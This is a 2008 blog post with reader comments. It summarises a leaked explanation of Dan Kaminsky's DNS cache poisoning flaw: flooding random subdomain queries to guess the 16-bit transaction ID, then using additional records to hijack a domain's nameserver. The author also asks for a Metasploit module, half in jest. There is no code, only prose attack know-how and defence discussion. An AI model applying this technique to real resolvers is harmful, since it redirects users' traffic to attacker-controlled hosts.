Monday, July 21, 2008

Kaminsky's DNS Issue Accidentally Leaked?

[Update 2: Thomas Ptacek of Matasano has since posted a public apology to Dan et al for the accidental postage. Regarding The Post On Chargen Earlier Today.]

[Update 1: Upon re-reading Halvar's explanation, it appears he got it closer than I originally thought, missing only the part about "bailiwick checking", which prevents a request for arbitrary.invisibledenizen.org from poisoning ns1.google.com. Halvar's solution, as written, would fail as I understand it. But one minor change (to using subdomains) makes it all function.]

It appears matasano posted an explanation of Dan Kaminsky's DNS issue to their blog today, but looks like it may have been yanked back down. My google reader account nabbed it via the RSS feed while it was up.

It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky, and when Halvar Flake posted some speculation on what the issue was, they referred to Halvar's post and their explanation hit the matasano blog. But Halvar's speculation was not the full issue; only a re-hash of previously known issues. Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :)

Rather than re-post their entire section and get crossways with copyright complaints, here's a summary of their explanation:

  1. There's a general principle of cryptography that says if you have to guess Variable A, it's incredibly helpful to be able to make as many iterations of variable A as possible. (See wikipedia's entry on "birthday attack" or google for more details.)
  2. DNS only uses a random 16-bit transaction ID that must be guessed in order to poison a DNS server's cache, and it must be guessed before the legitimate answer comes back. This is difficult to do on any individual requests scale.
  3. If you can slam a server with tons of requests, Point 1 above comes into play and allows you to reliably and quickly get at least 1 DNS cache poisoning packet to match the transaction ID. (Halvar's guess said this: force requests for random0000001.com, random0000002.com, etc, to generate a large amount of Variable A's. Eventually you'll guess one right.)
  4. This is obviously not very helpful. So what if I can poison bankofamerica349543.com.
  5. OK, so what about DNS wildcards? If you are able to poison random00001.invisibledenizen.org, what does that get you? Enter the additional RR set field. This allows you to piggy back additional DNS responses in addition to what was requested. For security reasons, you can only respond with additional answers for addresses that match the same domain. (E.g., if I submit a request for arbitrary.domain.com, the additional response section can only return info for domain.com sub-domains.)
  6. So the attack is this: do the above to cache poison randomXXXX.invisibledenizen.org, and in each packet have the additional RR return answers for ns1.invisibledenizen.org. Whenever random42156.invisibledenizen.org is the magical response that finds the transaction ID and poisons the cache, it will also poison the record for my nameserver, ns1.invisibledenizen.org.
Matasona stated this attack could occur in "less than 10 seconds" with current internet speeds.

Anyone want to throw together a metasploit aux module for this?

:)

-N

10 comments:

Anonymous said...

Could be wrong, but I don't think this is it. You shouldn't be able to send these extra RRs in your reply (at least they shouldn't be accepted). It also doesn't seem to match up with the little that Kaminsky has said about the bug so far.

Anonymous said...

http://beezari.livejournal.com/141796.html

Sergiu said...

Hello!

What is the NEW vulnerability? The birthday attack (easy to undergo for 16 bits, as key space is practically non-existent with the curent processing power, with 2at15 medium guesses for success), the multiple DNS querry and the extra RRs in the reply are not new!
Sergiu
www.sergiuzaharia.ro

Nathan Keltner said...

@sergiu: The newness of the attack really boils down to utilizing subdomains instead of domain names. The initial cache poisoning attack used the additional RR sets to poison off-site/out-of-bailiwick records. E.g., a spoof for random234ds34.com would poison ns1.google.com

Dan realized (apparently, he's still mum on details until Black Hat) that you could get around bailiwick checking by using subdomains instead of domains.

It does sound like Dan's got some more exciting stuff to show during his talk, and at a minimum I'm interested in hearing his stories from working with so many different vendors -- that sounds like a nightmare.

Bilbo Fraggins said...

@sergiu:
In the bad old days, if a recursive resolver requested the IP for yahoo.com, the DNS servers for yahoo could return results for microsoft.com as well, and the results would be accepted by the resolver.
They patched that, but poorly, so that a request for biteme.microsoft.com could also include the address for microsoft.com (or potentially www.microsoft.com, haven't verified the extent of the problem personally yet).
The upside is you get practically infinite chances to poison the cache instead of only one. That's a pretty big finding, and changes the nature of the game.
The new defense of port randomization only buys us a limited time, through an additional 15-16 bits of randomness, assuming the implementation didn't mess up the random number generator (like we have about 5 times before).
The real fix is DNSSEC (or potentially increasing the query ID to something like a 128-256 bit number).
DNSSEC is complex, perhaps hopelessly so, and roll out will take a while even when the TLDs support it.
Source port randomization at best moves the vulnerability back into the "known broken" class from it's newly discovered "broken by your grandmother" status.

Anonymous said...

I am wondering if this attack was used by NetDevilz back on 06.27.2008

http://tinyurl.com/693o5r

Timeline from that attack and Dan's find/announcement are peculiar.

Though i could be way off base.

Nathan Keltner said...

@anon I don't think that was it, because it appears from the screenshot they actually changed the DNS servers names in the whois records. The attack we think Kaminsky found was one where they changed the IP address of the DNS server listed in the whois record and the core Internet DNS servers.

Sergiu said...

Thanks Natron and Steve for details!
My feeling is that a perfect RNG is not a solution, as the key space is limited at maximum 2@32 (if port randomization is enabled).
That's why I suppose that Steve's 128-256 bit number for TID will really put malicious hackers in the cryptanalysts position! A 256 bit key is practically impossible to brute-force with usual resources. However, this will "contribute" to more traffic used for DNS.
I hope that some brilliant DNS experts will find a solution on how to not allow the other half of the vulnerability: auxiliary RR for out-of-bailiwick records, because RNGs are not easy to implement in software.

Anonymous said...

"Anyone want to throw together a metasploit aux module for this?"

Your wish is my command... svn up.

Anonymous said...

So...for us neophytes who don't understand all this technobabble - basically, you can ask any DNS server to do a lookup for you. There is a transaction ID (16-bits) used for validation of the response. If you flood the DNS server with lookups for a domain by using subdomains that has a wildcard DNS entry, you have time to guess the transaction ID (16-bit = only 65,536 possibilities) and therefore spoof the response. The DNS server then saves the response until the time-to-live (TTL) expires.

Right?

It is my understanding that the root servers can't be spoofed. Those are specific IPs reserved exclusively for DNS. The only real way to guarantee a legitimate IP address is to do a full trace from the root server to the target DNS server that houses the domain. But that approach defeats the whole idea of decentralizing DNS.

Important sites like Google, Yahoo, etc. should be on some sort of special list with pre-determined IPs that are retrieved by ISPs from the root servers directly (and, in turn, all clients pull the list from the ISP). Basically, the top 500 sites that people visit plus whatever organizations that can afford some sort of significant fee to be on the list. That would solve the majority of this problem. The DNS to IP mapping then becomes read-only and should require something close to an "Act-Of-God" to change. This approach also helps solve another problem - what to do if DNS ever becomes unavailable (e.g. nuclear attack...assuming, of course, the Internet is still functional at that point)? I could build my own personal list but that seems like a lot of unnecessary work.

Then again, I only barely understand DNS. These are just a few things that have crossed my mind.